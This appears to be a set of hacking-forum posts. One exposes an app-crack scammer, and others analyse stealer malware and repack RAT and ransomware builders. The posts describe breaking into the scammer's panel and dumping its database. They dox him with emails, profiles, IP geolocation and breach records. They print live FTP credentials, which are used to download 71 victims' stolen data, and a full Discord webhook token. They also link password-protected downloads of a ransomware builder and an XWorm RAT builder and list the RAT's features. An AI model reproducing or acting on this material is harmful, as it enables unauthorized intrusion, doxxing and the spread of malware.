Download to the Latest version of the Software, No I didnt purchase it so I would not be able to "ask"

No Trades/buying just give me the Link not making Promises of Cracking it just checking it out.

Discord: ObbedCode

Telegram: ObbedCode

Or Msg me on here (preferred)

Paul Zhielo (Scammer)

Pastebin for the Raw Text and Images:

https:// pastebin .com/kNBh4ixy

Now this User is not on Nulled (I dont think so) but more so this is an Outlet for me to Post Stuff so here it is

My interesting Year Journey of Paul and His AppCloner Scams

My Android Reverse Side of me I do ...

So before we start, yes he is a scammer, no there is no one pretending to be him its just him. He's a poor kid from a poor country in all honesty doesn't how how to code.
He also barley knows how to crack , I assume (assume) he just hired someone to help him or just to crack anything he needs. His coding skills I will say shows he cant code.

Lets start , It started when I would scrape the Internet for any AppCloner Cracks. If you don't know AppCloner think of it as a App to Clone other Apps but on Steroids.
It does more than just Clone, it Hooks, allows you to Modify the App to your liking. There is way too much to type so go to the URL to check it our for your self.

(Ultra+ Donation is 2400$ :x big money man)

https://appcloner.app/

I would find some, most old or just click-bait / fake google SEO stuff. Then a version floats around as "2.7.x" , there were already "1.5x" cracks but they are too old.
Each new update with App Cloner is always big (++ app).
It would be Cracked by a Person Named "Paul Zhielo" , at one point It possibly had a Login Panel on it (PHP Server) but it used weak protection making it easy to Crack the Crack.
It got leaked , then Rumor of version "2.9.x" was Floating also Made by Him.

Paul Typically hung around Telegram.

Usernames:
"PauLZhieLo"
"Javacode002" (PZ)
Chats:
"Javacode002" (PZ CHANNEL)
"PauLGroupChat"
"PauLModz_VIP" (PauLModz)

So for a while I respected him / his skill, then came the scams... So understanding new versions of App Cloner were out with NEW COOL FEATURES
I would not mind a NEW Cracked Version ... I tried my self to bypass the Stack Decryption and did it, some other things but nothing Crazy.
So a new Message from Paul (both accounts always) came out that he has (2.10.x) Crack. It was around 45$ if I am not wrong, and well I wanted it.

I messaged him on "PauLZhieLo" and he said:

"send on [email protected] make screenshots after i verified i will send your latest appcloner mod"

The name on the PayPal is "Paolo Manahan" now has the App Cloner Logo as the Profile

So I did, and well he sent but with a twist, it was a rebrand of a already free cracked version.
I have a Fake Paypal to Help Charge Back on Scams assuming not Family n Friends but I missed that step (oops) so I got Scammed ...
 

Moving on I assumed he eventually died out, but he didnt , he just used another account claimed the other guy was scamming that it isnt him...
(despite him still using the same BTC Address)

(despite him mixing both accounts in similar chats / merging them as if he is one person) bUt No ThE oThEr PeRsOn Is ScAmMiNg.

He now has AppCloner "2.16.x" Crack for sale ...

I download the new "2.16.x" apk From his Chat Both Chats his "Real" one and his "Scamming" one (they are both the same)
Whats funny is when he Dropped "AppCloner_2.16.9Mod.apk" the File size is "62.1" mb then he dropped "AppCloner_2.16.10Mod.apk" also the same exact file size..
Nothing was changed didnt even bother adding a few more bytes to the File just changed the Version String / Number.

Maybe the "whatsnew_en.txt" in assets

Looking at the Apk , It has some Shit Login Menu , and is Protected with "Jiagu 360" a Chinese Protection that does "dex2c" Converting the Dex Files into C Code ".so"
I looked at the APK Under a Tool called "NP Manager" a Apk Tool / Editing Tool for Android (Not for the PC) yes Dex editing / APK Modding can all be done via Phone.
Looking at the "assets" folder in the APK I see many Things, a bunch of "lib.so" files mainly for the "360" Protection.
Alot of interesting ones but looking at the "whatsnew_en.txt" it does show that it is the "updated" AppCloner based off of what's new, but looking it also has the AppCloner "2.16.x" APK in the Assets Folder

So the AppCloner Apk in the AppCloner Apk
So that didnt make sense... Maybe it Unpacks the APK then Hooks to Bypass Login ? who knows only way to know is to Dump.

Dumping the "Jiagu 360" Protected Dex's then Rebuilding will Produce the Unprotected APK.

File went from "62" mb to "170" mb when Dumping, so AppCloner "1.5.x" ? Code with the AppCloner "2.16.x" APK in the Assets Folder .. Kek
Now we get the Truth. Talking to AppListo (dev of appcloner) the new Updated APK in the "CloneSettings" Class Should have Fields that have the String "Snow" in it as the new "2.16.x" versions now Have a Snow Theme for the Holidays.
It didnt, matter in fact it was missing ALOT of settings that would be in any version of AppCloner "2.X" .. and the APK that is "2.16" is in there but seems to not be used at all more something to throw people like me off
Assuming nothing is going past the "360" Protection.

Well I have issues so ofc I cant stop til I know the truth. The "Auth" is easy to Bypass its just a Pile of Shit. Lets pretend we didnt Unpack it , lets get into Part 2.

The Panel

Decoding a Base64 String in the APK Gave me the Login Site => https://paulzhielo.0...p.com/login.php

So I messaged his new account "Javacode002" acting as if I am a potential buyer (im not) 

I play dumb act as if I want to purchase he says:

"Send 2200 php if single device and 2800 php if you want multiple devices, send on [email protected] send via friends and family so the balance will not become onhold"

I said Send proof he sends Pictures of (old buys as well as people he scammed) and a Video of the AppCloner mod BUT

in the Video the Settings "Identity & tracking options" says "0 of 16" , so it has a total of "16" options
Ummmm ... "2.16.x" should have at least "20" options ... so he could not even match the video up with what he is scamming with ..

How sad, remember "Javacode002" Sent ME that Video HE DID not a Scammer HE DID.

This time around the PayPal I used is Banned so I cant send but I want a way in (without cracking / tampering a legit way)...
While doing some Digging online I found: (He Replied to this Thread)

"https://platinmods.c...zhielo.2219124/" and what was Interesing => https://platinmods.c...0/#post-2233218

Hmm I wonder how he made his Login Menu , did he change alot ? no. did he make it ? no. ofc ... he scams.. he cant code .. :< he just copied pasted code

Passing this part off to my buddy lets call "Z" he Rips this Site apart , He dumps the DBs as well as the Login to the Main Panel: https://paulzhielo.0...erification.php

(Its ez tbh should of been Brute Forced):

Database: id16009052_mypannel
Table: usuarios
[1 entry]
+------------+----------------------------------+
| login      | senha                            |
+------------+----------------------------------+
| paulzhielo | 81dc9bdb52d04dc20036dbd8313ed055 | Hashed password is "1234"
+------------+----------------------------------+

I login to the Panel and well there it is all, every account I don't think its for AppCloner but more so Mixed with his other services as most don't work for AppCloner
To my understanding he would not give logins just bailed once he was payed. Sometimes Just a APK no Login (Fake Version)

Or He would make you a Login on the Go.

I tried logging into many the one that worked ez was  "PauLZhieLo" "1234" .. wow we could of all just logged in with this from the start .... o well
So now I delete all of his Users bye bye.

Scam Proof:
 (t.me/windowsundandroid) => https://imgur.com/a/VNErz0u
 (Ressy) => https://imgur.com/a/g5xYB2D
 (Alexa/Etc) => https://imgur.com/a/x19e0oW
 (Second Attempt w Me) => https://imgur.com/a/6p9GPId

Pauly: => https://imgur.com/a/5LlfuFW

Pauly v2 => https://imgur.com/a/xDRsJYi

https:// imgur. com/a/xDRsJYi

Rest of Images:
 https://imgur.com/a/6p9GPId
 https://imgur.com/a/X0Hlyhp
 https://imgur.com/a/FdQVcHg

Downloads:
 (All Images) => https://wormhole.app...1UJsyaBEaPFy3jQ
 (Killed APK) => https://wormhole.app...QHQQHaqWpGuJrWg

Moral of the story, Dont Scam, Dont be a Skid and Scam

Dont Copy Pasta Code (Skiiiddd) (Paul thats you)

Dont act like we are dumb ("Im NoT sCaMmInG tHaTs ThE oThEr DudE nOt Me")

Stop being Poor Paul , we get it you do things because you live in a Mud Hut but there has to be better ways of Making Money

Also Dont use weak password you fucking skid

I here working the corner Kissing Dudes Makes you money

This is my Compiled Information I have:

[email protected]
[email protected] => (Paolo Manahan)
[email protected] => (Paolo Manahan)
https://ph.linkedin....hielo-836ab71b9 => Paul Zhielo , Modder at Reverse Enginering, Camalig, Bicol Region, Philippines (Peopledatalabs came up with nothing)
https://www.facebook...D13Kn9TLStLRvl/
https://m.facebook.c...1/?locale=hi_IN
https://platinmods.c...zhielo.2219124/

[Telegram]
Javacoding11
Javacode002
PauLZhieLo

[Dumps] (Some may not be him but possible hits, take with a grain of salt)

[Twitter]
Username: paolomanahan
Email: [email protected]
Name: paolo manahan
Created: Thu Oct 20 11:15:04 +0000 2011
Followers: 1

[Wattpad]
Username: jokring123
Email: [email protected]

Lastip: 122.2.113.3
As: AS9299 Philippine Long Distance Telephone Company
City: Manila
Country: Philippines
CountryCode: PH
Isp: Philippine Long Distance Telephone Co.
Lat: 14.5833
Lon: 120.9667
Org: Philippine Long Distance Telephone Company
Region: 00
RegionName: Metro Manila
Timezone: Asia/Manila
Zip: 1018

Hash: $2y$10$0wQ7fWE3Fq3CQvLt2Usmbe8yPZ7ChjUjsrhgeir2K4A8Ri79Haore
Hash not found!
Name: jokring123

[Wattpad]
Username: PaoloManahan0
Email: [email protected]

Lastip: 112.198.98.175
As: AS4775 Globe Telecoms
City: Lahug
Country: Philippines
CountryCode: PH
Isp: Globe Telecom
Lat: 10.3387
Lon: 123.8998
Region: 07
RegionName: Central Visayas
Timezone: Asia/Manila
Zip: 6000

Name: Paolo Manahan

[CLIXSENSE]
Username: arcticorange
Email: [email protected]
Password: arctic
Name: Paolo Manahan
City: Valenzuela
Country: PH
Zip: 1440
Gender: male

Clean

Clean

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

~ Has an executable & Python File , can be an executor for the script but its not sadly

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

~ Original File name "RuntimeBroker.exe"

The best part about Malware Reverse Engineering is at Times you will Run Into Samples that require to login into some site to either access or store files.

The user: "Chessgoder" had a great idea to have a stealer that uploads stolen victim information to an FTP server

Not just that but..

to spread it on Nulled ? very risky I say for the server

Now I will take you on the Journey of me Reverse engineering Python Malware with FTP Login

Analyzing the first file I received from him right away he gets it all wrong . It really pisses me off how sloppy these devs are ..

He has a .NET DLL as the dependency for his ".exe" file .

"Well Whats wrong with that ?"

The executable has nothing to do with .NET it was built / Compiled in "Python" "PyInstaller"

Python using .NET dependencies ? cmon you can do alot better ...

To detect the Assembly Type we use this tool called "DIE" , "Detect it Easy":

https://horsicq.github.io/

https://github.com/h.../Detect-It-Easy

The same I am analyzing is "Cracking-island" AIO Cracking tool of some sort.

Specifically "[MULTI TOOL] CRACKING ISLAND ACCOUNTS, COMBOLISTS, PORN, TOOLS AND MORE."

To Unpack / Undo "Pyinstaller" we can use the GitHub tool: https://github.com/e.../pyinstxtractor

As you see it gives us possible entry points so we has somewhere to start looking. Before we do that lets analyze the dumped / extracted files.

Within these files we find another executable linked to it called "CrackingIsland.exe" (Seems to be the legit tool)

We also see the entry point files since we want to see what happens when this program is launched. Now when I run it in Sandboxie it opens a powershell then quickly terminates it self .... hmm ...

We understand what ".pyc" files can be entry points given the output log of "pyinstxtractor"

[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: contain.pyc

Before we can go snooping at these ".pyc" files , these files are not treated like text documents so we cant just right click edit with notepad++ see the python source code.

We will use another tool that converts Python Byte Code into Readable code for use

Another tool from Github: https://github.com/zrax/pycdc

Now building this file is difficult for windows using the "C Make" / "Make" Commands I am not advance enough I suppose to get it working for windows , at least without errors

So we start up out Linux Virtual Machine , specifically this installation / flavor is "Parrot OS"

We run our few "Make" Commands and works like a charm so lets start working with it.

We drag and drop the possible entry point Files into the VM Desktop , rename them so its easy to write on the Shell / Terminal

I usually name them like "1.pyc" "o.pyc" does not matter , whatever makes it easier.

Command goes as: "./pycdc <FILE.PYC>"

The first file we de-compile is "pyiboot01_bootstrap.pyc"

It does not seem to have anything interesting so we then de-compile "pyi_rth_inspect.pyc" same thing .... hmm

Then the final file "contain.pyc" , it prints a lot onto the Terminal , too much , and it looks like Powershell ... ohh I think we might have a hit.

Now its too much for the Terminal to output so using "pycdc" we can add another argument to write the de-compiled data to a output file as such:

"./pycdc <TARGETFILE.PYC> -o <OUTPUTFILE.TXT>" we use the "-o" argument with a path following after , now you don't need the "<>" brackets.

We then Copy this file over to our host machine to further analyze and look into it. Right away it a shit ton of text compressed into one ish line so we will have to "fix" / beautify it

I look for every "$" or "\n" or "{" and start it on a new line so now its all Multi Line.

First thing I notice it has "Anti VM" to make sure its not Executed in a Virtual Machine

The further we go , the more it reveals, it steals all your browser Passwords / History / Cookies , it takes Screenshots,

Even Downloads files from your Desktop / Downloads Folder, Steals Network Information / Passwords.

It just Keeps going and going until we see "ftp"

                    $w6PbopTSTweQdDrfj = \'ftp://191.96.63.85/victims/\' \n
                    $fTrjrdwSrfTrDwobj6 = \'u646124700\' \n
                    $ffwoDrwoTTfd6dworfS = \'Majorero2411\' \n

Address: "191.96.63.85"
Username: "u646124700"
Password: "Majorero2411"

So lets have fun , we will use "FileZilla" to login.
We get a successful connection

Right away the Directory that stores the stolen information is under "victims" the namespace seems  to be "chota.com" -> "public_html"

To be exact it has 71 Victims:

Now lets start downloading ... We will download all files for once because (I still have that left over black hat but mostly so I can contact the victims about their security)

Especially since one of them Owns a Company , Has a website with logins , Source code , Scripts for the Workers to say etc. Seems to be a company Computer...

To make it clear I have no mal intent , but to own a website / company and do naughty things on a computer that holds that data, well cmon ....

When we view the password Files, it seems to have Chinese text chars for random parts of the file , can be the "Username" Field, "Password" Field , "URL" Field , its Random

Seems it either failed at decrypting parts of the info , or improper encoding / decoding for the text.

If failed to decrypt that will be an issue as far as decrypting as the "Master key" isn't actually really stored anywhere and newer Chromium Based Browser

Use AES-GCM Decryption that uses a master Password Located in the "Local State" File , that we don't have

If the Password that is Encrypted Starts with "v10" or "v11" that mean its uses "AES-GCM" that will need a Master Password, you can use C++ "BCrypt" API For that

Else you can use functions like:

https://learn.micros...ptunprotectdata

The C++ WinAPI Called "CryptUnprotectData" to Decrypt it

Hmm well lets see...

Our of curiosity I decided to throw the text document in "HXD" a Hex Editor to possibly see if I can make sense of the Chinese Chars.

And well if we look at the portions to where the Chinese Chars are suppose to be , it appears somewhat plain text , but enough to let us know it didn't fail to decrypt it just failed at decoding / encoding.

HXD: https://mh-nexus.de/en/hxd/

So now lets make a tool to Decode the Text properly and Write it to a Text File.

Since we will heavily be using Buffer and Bytes and Encoding we will use ".NET/C#" Since its a safe and easy language

We need some way though to identify the Chinese Text Strings and or Identify each string, I start looking at HXD after and before every Field that is Encoded with Chinese Chars

I notice they have Byte Patters the Byte Sequence is "0x0D, 0x00, 0x0D, 0x0A, 0x00"

Understanding Text , this looks to be in Unicode / aka using 2 Bytes from each Char so "55 00" would be Char "H"

I notice this "0A" Char a lot as well, I don't know what specific char that is as it appears in HXD as "."

I also Understand this Text Document has "\n" Chars , aka New Line char so signify when data is on a New line

But what are the bytes for the Char "\n" ?

Hmmm.. how can we figure this out (We can go into .NET use:

BitConverter.ToString(Encoding.Unicode.GetBytes("\n")));

but instead we used our good old Friend "GPT"

We ask it:

"what is the byte code / value for "\n""

It Replies:

In ASCII encoding, the byte code/value for the newline character '\n' is 10 (in decimal). 
In hexadecimal representation, this value is 0x0A.

I had more context relating to C# for some CLR Questions , but specifically what we are looking for is the "Hexadecimal" Value of "\n"

Hexadecimal is way to represent a number using the "Base16" System

Little about the "Base16" System

Most Humans use the "Base10" System: { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

"Base16" Extends the representation of a number by using the Alphabet: { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F }

its a way we can represent Large numbers in the "Base10" System in a smaller looking number ? If that makes sense ? Binary aka Computers use the "Base2" System

Since our reset point is after "1" a Base2 Number can get large the bigger you increment , large length wise

(OK enough of the Base System sorry I get lost sometimes in teaching , Base systems was something took me a while to understand learned years ago )

Either following Before or After (Depending on if Little or Big Endian or LSB / MSB ) byte 0x00 / 00 Will be its partner next to the actual byte "0A"

Given that its Unicode it represents it self with Two Bytes of Data for each Char.

Now that we understand this we can essentially find that byte sequence: "0x0D, 0x00, 0x0D, 0x0A, 0x00"

To Split at each new line of Data understanding that byte Sequence contains "0x0A" the "\n" Char and some other Bytes that appear before

From there each Line , we will get the bytes Read Unicode from it, Add it to a List of Strings and Re Write the Text to a new Document and we shall be good

Now before you say anything , yes there are probably software out there to help with my issue

Notepad++ didn't seem to work but I am also a more do it my self person I just prefer doing it my self.

Also yes the code can be optimized a lot more, sped up more, cleaned more, even made to be more safe but if it works, it works for now

So lets See the Code:

Now when we drag and drop the Text File into the Program to Fix up, the output for the Console looks like:

We open the Text Document, and Boom its Fixed so happy now and so proud

So now we will Nuke the Server by Deleting all the Contents on it, Attempt to Shut it down (I don't think I can do that from my end )

Spread the credentials to render the access invalid since it is now public and everyone has access to the server and is aware of it.

Leave a little Note in the FTP Server let them know I was there

Also contact any of the victims about security and they may have been compromised

Also a lot do seem to be analysis machines as their "Anti-VM" / "Anti Analysis" Method is really weak

RIP:

IMAGES:

https://imgur.com/a/lbSVbzN

SCANS:

As always stay safe out there guys , always run programs in a Sandbox or a VM !!

Scanning ...

"Costura" scared me for a second but he uses it to load other dependencies in , pretty cool use

Anti Debug Is interesting

++ Code

Clean 

hmmm

So Recently it has come to my attention a new service has appeared onto a Discord Server to Create a Stealer from a Bot in a Discord Server.

You start a Ticket and type in "/build <DISCORDWEBHOOK>" then it will upload a file to "https://gofile.io" using their API without a key.

Now in theory you build this and each victims that Runs it will have their Creds such as Browser Password and Discord Tokens and what not sent to that Web Hook.

Now it seems too good to be true ?

No Paywall ?

No Monthly Service Fee ?

FUD ?

Wow this is Amazing let me start using it NOW !!

Before we do that lets do some Analyzing
Now this is Made in ".GO" but the Executable just seems to be the Dropper to prep things.

It will drop a .DLL in your %AppData% Roaming Folder Called "stripelib.dll" as well with .DB Files with your Passwords.

Now to begin Dropping Files is not the way to Go

But hey they are learning it seems.

In order to Execute the .DLL they use "rundll32.exe" that can silently execute DLLs on Disc

He uses the Param "threadFunc" if we look at the .DLL exports we Get a Function Called "threadFunc" so that's the Function they are executing.

So the first Stub I build has a webhook of "google.com" so I can separate web requests to make sure I'm not mixing up the Web requests.

The third one I build was "cock.li" "Web Hook"

and the fourth one was a Valid Discord Web Hook and hear if My analysis.

So Running Versions 1 & 2 it Creates a Web Hook Request DESPITE me not using a Web Hook.

Its a Success POST Request so its not a disabled Web Hook Yet, as well when you click it, it gets you the Webhook Info making it still Valid 

Note these first few are on my ACTUAL Machine I Ran no Analysis Machines.

Now I did have it under control but it failed to grab all my passwords. It did Successfully Find my Discord token and Send it to a Web Hook?

How I didn't build it with a valid Web Hook?

Copying the URL the Web Hook Seems to be:

https://discord.com/...g6neko_c_Xthcpd

Going to the Web Hook the info of the Web Hook is:

https://discord.com/api/webhooks/1047134409901477949/z1uIKiYIeOstu5EwJTYIr8Cy2tBsJpu3H5omedTmFP9r-usz4kV5Eg6neko_c_Xthcpd

{"type": 1, "id": "1047134409901477949", "name": "Mirai", "avatar": "c835bed462f49c57e810d2c2c01ebc92", "channel_id": "967461371849629716", "guild_id": "350710523874246656", "application_id": null, "token": "z1uIKiYIeOstu5EwJTYIr8Cy2tBsJpu3H5omedTmFP9r-usz4kV5Eg6neko_c_Xthcpd"}

Now you notice no other Web Requests ?

Because those build had Invalid Web Hooks.

Now I do have passwords saved on the machine but the malware seems to do a TERRIBLE job at grabbing Saved Browser Passwords.

They Dump Browser DB Files and Uploads it to: https://gofile.io

Now before you say "ShOw CoDe Or YoUr LyInG"

No.

This is the WEB Requests coming from YOUR File

We can Identify that because your file is the only ONLY thing Running with "rundll32.exe" so its easy to separate.

In theory once and if it does grab your passwords it will upload it and send it with the Web Hook as well that you have no affiliation to.

I asked the Dev about this, he just throws Insults such as "N*gger" and "Skid" and his best excuse is "Its to Look at Virus Total Machines"

But if we look at the HTTP Request it Sends ALL information to that Web Hook.

Last I check VT Machines don't use Discord ? and to Identify them You Don't need their Discord Token ?

Also my machine is not a VT Machine ? that excuse does not make sense at all because despite the machine type

It will send him the stolen Information no matter what.

Now yes to be fair these photos are from a VM. I did run it on my real machine to Confirm yet again it still does what I explained above.

I go on to Explain. Grabbing Virus Total Machine Names is useless. They use Generic Names, and often people can use Generic Names on their Computer.

He goes onto say he gets the HWID (but that useless as they are hardened so doing that well end up flagging nothing) but even in the HTTP Request as seen above.

No where in the packet it has my Machine Information or HWID ?

It seems he does not know how to properly identify analysis machines and likes to believe he has the skill to

Now lets move on. The Real Question is, Does it at least AT LEAST send the data to your Web Hook if you input a Valid Web Hook.

The answer is Yes , yes it does.

BUT

It still sends him the Data to his Web Hook as well....

So lets look at the HTTP Requests. Now we are still missing the one Web Request that Uploads to the File hosting website your Creds

That's because once again he uses a Shit method that is not stealthy by any means but hey that's the limit of his skill I suppose.

To Conclude this , this is enough to support and say its sending him the stolen information as well. If you are ok with this then use the service as you please.

Do note its not the most stealthiest though it is undetected for now, and it does not always grab browser passwords nothing the less its the attempt ?

On top of that this has nothing to do with the original "Mirai" its a shit remake.

Also note his claim it is FUD (FULLY UNDETECTED) is always false, it at least gets noticed by a few AVs 3-5 at its prime.

It as well does not have auto start despite the claim ? I looked at all auto start entries possible nothing new ...

I can predict he will refute this by saying some excuse along the lines of "Its for VT Machines" or "Show Code"

Do this your self , I showed the evidence , as I said use this software if you are fine with terrible execution and or sending stolen information back to the owner.

No point in bringing it up with him as he cant have a civilized conversation / argument and just throws insults so I shall do the same.

So the argument "ShOw CoDe"

No. Not needed stop coping accept the facts as presented, and explain to your people you keep the information as well.

No one wants to Reverse engineer your Shit .GO malware if we can just look at the web requests.

It does have detections is NOT Fully FUD but is Un detected that I can give him.

How long ? I don't think long given his malware is pretty easy to spot and Identify given how it works.

His whole excuse for not seeing code is nothing more than a shit cope, and for not releasing "source" code is not because

of detections but because of not wanting his customers to see the code where it sends the information.

I ran it on legit machines, hardened VMs you name it , it has the same behavior. 

Don't believe me ? do the test your self . Here are some samples I have made.

NEW UPDATE:

He has a forum as well he stopped using "Run32dll" and actually added startup

https://www.hybrid-a...80d9d23ab0fb4c5

https://www.virustot...da5d2/detection

So now also Malwarebytes, Microsoft , ESET, Google detects it no matter what.

That could be because of his shit startup Method.

Having those AVs detecting is as bad as it gets as everyone has Defender

People use Google, Alot of people use Malwarebytes.

He even started his own forum how cute

On top of that they no longer drop a .DLL so less dropped files the better I see he learning from his mistakes

Btw the webhook is now deleted , it took me time I just wanted to have fun first before I let it go

His Forum:

Even New Update:

He now Dropped .GO and made it worse now uses 'node.js' shitware

All Images:

https://imgur.com/a/vW2jH4R

https://imgur.com/a/oSKfsw3

https://imgur.com/a/cjILVgw

His Github:

https://github.com/W...CC/MiraiStealer

Scans:

Mriai.exe: 1

https://www.virustot...8cb8b/detection

https://www.hybrid-a...bea7613be08cb8b

Mirai.exe 2

https://www.virustot...d71dea20483ae6b

https://www.hybrid-a...d71dea20483ae6b

Mirai.exe 3

https://www.virustot...c2657/detection

https://www.hybrid-a...347479987ec2657

https://www.virustot...be5_Zenbox/html

New Build Mirai:

https://www.virustot...be2db/detection

https://www.hybrid-a...c12c1269e7eefd8

stripelib.dll

https://www.virustot...c96cb22860cbbe5

Download:

Password: Nulled123

https://anonfiles.co...fy2/Samples_zip

hmmmmm

hmmmok

To clean the file we have to rename a .DLL to .EXE and modify some sus IL Code.

Removed the Original .exe that is just a virus

Note I cleaned the File, You Can analyze the file for yourself in DnSpy

Still Run everything in a Controlled Environment. My version is the Fully Cleaned Version.

 Even has the Decryptor in the same Folder

Person Spreading Malware:

Original Report:

===================================================================

DOWNLOAD

===================================================================

Password: Chaos46366

Upload.ee

Anonfile

Zippyshare

Mirror Ace

===================================================================

SCREENSHOTS

===================================================================

Original Analysis:

(Still always run EVERYTHING in Sandbox / Virtual Machine)

Stub SRC:

https://ghostbin.me/638423de9f983

VT:

https://www.virustot...73a40/detection

HB:

https://www.hybrid-a...12f35ab45e73a40 

https://www.hybrid-a...7de157a8227672a

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

~ Been Modified today ...

~ ICON looks off

~ Assembly Attributes look odd

~ The original .exe is a Python File and the .dll is .NET ?

~ When renaming it from .dll to .exe it is the original .exe so the python installer file is the infected file

~ The infected file is poorly coded to a point it just crashes for me

~ maaruii had code to kill any process in %AppData% , im pretty sure it was for something else but shit code i removed

			string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
			Process[] processes = Process.GetProcesses();
			foreach (Process process in processes)
			{
				try
				{
					if (process.MainModule.FileName.Contains(folderPath))
					{
						process.Kill();
					}
				}
				catch
				{
				}
			}

~ Stub SRC Code: https://ghostbin.me/638423de9f983

Scans on malicious file "Chaos Ransomware Builder  v4.exe"

~ VT: https://www.virustot...c519c/detection

~ HB: https://www.hybrid-a...96db174f30259f2

~ Connects to Discord maybe a webhook ?

For a second I assumed it was the stub dropping in the TEMP dir from the second "builder.exe" file as that was being executed but I assumed if it was not connected to a valid server that would exit the stub, I was reversing it for a TCP Connection and realized it is using a Telegram Channel to send data to , The RAT uses a TCP Connection over a Custom Port , Telegram is not involved. So Come to find out, it was his Stealer he binded.

So you almost got me :< but the weird admin prompt ? , the Fake Error ? , and ofc dropping this in the %temp% folder on Disk for AVs to Scan Un-Obfuscated Code 6/10 I give it

Good Concept ?

Ps , Yes this is the CLEAN version , still run in sandbox tho . Good Practices

Screenshots of Program

====================================================

FEATURES

====================================================

[+] Run File From, URL / Disk / Memory / RunPE

[+] Blank Screen, Disable Win Updates, Run Shell , Invoke BSOD

[+] .NET 3.5 Installer

[+] UAC / Firewall / Taskmgr / RegEdit , Disabler + Enabler

[+] Shell / Webcam / MIC / Monitor / System Sound/ File Manager, Control

[+] TCP Connections Monitor

[+] Clipboard Manager + Password Manager

[+] Installed Programs Manager

[+] Activate Windows Option

[+] DDoS

[+] VB.NET Compiler / Google Maps

[+] Fun Functions

[+] Keylogger / Chat / File Searcher

[+] USB Spread + Bot Killer

[+] Prevent Sleep / Auto Sleep Disabler / Change Wallpaper / Message Box Popup / Delete Restore Points

[+] UAC Bypass 

[+] Coin Clipper / Swapper

[+] Ransomware 

[+] Ngrok Installer

[+] Tinynuke HVNC

[+] VNC Viewer

[+] Windows Defender , Disabler / Remover / Exclusion

[+] Startup, Registry / Folder / SCHTASKS aka Scheduled Tasks 

[+] Worm

[+] Anti Analysis

Thats most of it   

====================================================

DOWNLOAD

====================================================

Password:

NULLED.TO

AnonFile

Zippyshare

Upload.ee

Sendspace

MirrorAce

Analysis of Infected File:

VT:

XWorm-RAT-V2.1-builder.exe => https://www.virustot...aefe66807eac93a

win-xworm-builder => https://www.virustot...e2307b80a560319

~ Telegram Stealer Dropped in %temp% Dir under "win-xworm-builder.exe"

~ Has Basic Anti Analysis as that was part why Id assume it was cracking so it was just the stub, either way easy to Bypass "CALL => NOP"

~ Telegram Chat Channel ID 2024893777

~ Steals From

"Google\\Chrome"
"Google(x86)\\Chrome"
"Chromium"
Opera Software\\Opera Stable\\Login Data"
"BraveSoftware\\Brave-Browser"
"Epic Privacy Browser"
"Amigo"
"Vivaldi"
"Orbitum"
"Mail.Ru\\Atom"
"Kometa"
"Comodo\\Dragon"
"Torch"
"Comodo"
"Slimjet"
"360Browser\\Browser"
"Maxthon3"
"K-Melon"
"Sputnik\\Sputnik"
"Nichrome"
"CocCoc\\Browser"
"uCozMedia\\Uran"
"Chromodo"
"Yandex\\YandexBrowser" 

https://imgur.com/a/bqXIFS6

https://imgur.com/a/lxFgPm4